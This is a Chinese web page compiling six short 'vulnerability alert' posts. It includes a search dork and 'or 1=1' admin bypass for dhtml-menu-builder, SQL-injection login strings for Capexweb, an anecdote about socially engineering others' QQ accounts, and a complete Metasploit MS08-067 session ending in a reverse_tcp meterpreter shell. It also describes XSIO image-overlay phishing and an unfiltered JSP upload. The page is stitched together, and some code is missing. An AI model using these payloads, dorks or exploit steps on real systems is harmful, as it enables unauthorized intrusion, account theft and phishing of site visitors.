dhtmlmenubuilder密码及XSS跨站漏洞漏洞预警

下面是小编为大家整理的dhtmlmenubuilder密码及XSS跨站漏洞漏洞预警(共含6篇），仅供大家参考借鉴，希望大家喜欢!同时，但愿您也能像本文投稿人“好像不快乐”一样，积极向本站投稿分享好文章。

篇1：dhtmlmenubuilder密码及XSS跨站漏洞漏洞预警

漏洞说明：来自国外dhtml-menu-builder Auth bypass and Persistent xss； dhtml-menu-builder.com/；该系统存在严重的后台管理员验证绕过漏洞，以及XSS跨站漏洞，

dhtmlmenubuilder万能密码及XSS跨站漏洞漏洞预警

，

发布者/日期：Sid3/-05-06

谷歌关键词：Powered By: “Powered by dhtml-menu-builder.com”

漏洞类型：sql注入漏洞、后台绕过验证、XSS跨站漏洞……

漏洞测试：www.cnc.net/admin/index.php

用户密码均为：or 1=1

漏洞修复：增加后台验证，过滤相关敏感字符

篇2：Capexweb密码漏洞预警

标题: Capexweb Sql Vulnerable

作者: D1rt3 Dud3

受影响版本: 1.1

问题描述:

Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.

www.badguest.cn /capexweb/capexweb/

Log in details:

Username: x'or'x'='x

Password: x'or'x'='x

修复：

加强验证过滤

篇3：一个密码的沦陷漏洞预警

说社工强大,一点都没错,这次渗透让我有一点点成功感.，某日无聊在朋友那边拿了些QQ号玩.(都是6位一代的)，先看了一些都不行,哎现在死TX搞的什么规定要挂很长时间才能改.

要到改的时间了,主人早发现了.

就社工下. 看了下QQ空间,貌似没什么利用的..

篇4：MS08067漏洞漏洞预警

这个漏洞已经暴露了很久了，这里我就不说原理了我也不会，所以直接用metasploit操作一下，大牛请绕过

root@bt:~# genlist -s 10.10.10.*

10.10.10.1

10.10.10.2

10.10.10.128

10.10.10.130

10.10.10.254

root@bt:~# nmap -sS -Pn 10.10.10.128

Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT

Nmap scan report for attacker.dvssc.com (10.10.10.128)

Host is up (0.0000060s latency).

All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

root@bt:~# nmap -sS -Pn 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.011s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

root@bt:~#

root@bt:~# nmap --script=smb-check-vulns 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.00032s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Host script. results:

| smb-check-vulns:

| MS08-067: VULNERABLE

| Conficker: Likely CLEAN

| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

root@bt:~# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...

the matrix has you

follow the white rabbit.

knock, knock, Neo.

(`. ,-,

` `. ,;' /

`. ,'/ .'

`. X /.'

.-;--''--.._` ` (

.' / `

, ` ' Q '

, , `._

,.| ' `-.;_'

: . ` ; ` ` --,.._;

' ` , ) .'

`._ , ' /_

; ,''-,;' ``-

``-..__``--`

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]

+ -- --=[ 927 exploits - 499 auxiliary - 151 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search ms08_067

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130

RHOST => 10.10.10.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 10.10.10.130 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128

LHOST => 10.10.10.128

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.10.128:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows - No Service Pack - lang:Unknown

[*] Selected Target: Windows 2003 SP0 Universal

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 10.10.10.130

[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400

​

篇5： XSIO漏洞漏洞预警

文章作者：aullik5

原始出处：hi.baidu.com/aullik5/blog ... a02c6785352416.html

今天要讲的这个漏洞是一个非常猥琐的漏洞，

XSIO漏洞漏洞预警

。

大部分网站都有这个漏洞，不光是百度。

什么是XSIO，为什么说它猥琐呢？

XSIO是因为没有限制图片的position属性为absolute，导致可以控制一张图片出现在网页的任意位置。

那么我们就可以用这张图片去覆盖网页上的任意一个位置，包括网站的banner，包括一个link、一个button。

这就可以导致页面破坏。而给图片设置一个链接后，很显然就可以起到一个钓鱼的作用。

XSIO漏洞：

由于对正常的HTML 标签 是没有做过滤的，所以我们可以用这些标签来实施XSIO攻击，

在百度，发blog是在一个table里，所以我们要先把table闭合掉，然后再插入合适的图片。

如以下代码：

复制内容到剪贴板

代码:

通过控制 left 和 top的值，我们就可以把这张图片覆盖到网页上的任意位置，而link 则是指向了 www.ph4nt0m.org

百度.jpg(40.08 KB)

2008-10-21 20:50

如图：匿名用户的头像被我覆盖到了banner处.

在实施具体攻击时，可以用图片覆盖link或者banner，当别人点击原本是link或button时，将跳到我们的恶意网站去。

所以说，这是一个非常猥琐的漏洞！

欲知后事如何，且听下回分解！

PS: 本次活动仅仅是个人行为，与任何组织或集体无关.

从明天开始，将进入我们的XSS之旅。

篇6：DeepSoft.com.sys.Servlet上传漏洞漏洞预警

作者:hackdn

转载注明

JSP+MSSQL的系统，国外应用广，出在注册上传上，过滤不严，修改下面POST，上传JSP

要上载的照片:

DeepSoft.com.sys.Servlet上传漏洞漏洞预警

，

文件大小没有限制，只是“*.ai,*.psd”文件可能上传后无法显示而已。“>

★ ECSHOP跨站+后台文件包含=Getshell漏洞预警

★ FCKeditor漏洞利用总结漏洞预警

★ 启航文章管理系统存在跨站脚本漏洞

★ 跨站脚本执行漏洞代码的几点思路

★ PHP 5.2.11/5.3.0 的多个漏洞漏洞预警

★ 关于MS08067的一点细节漏洞预警

★ dedecms 5.7 edit.inc.php文件注射漏洞预警

★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警

★ Thaiweb远程文件sql注入漏洞0day漏洞预警

★ 火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警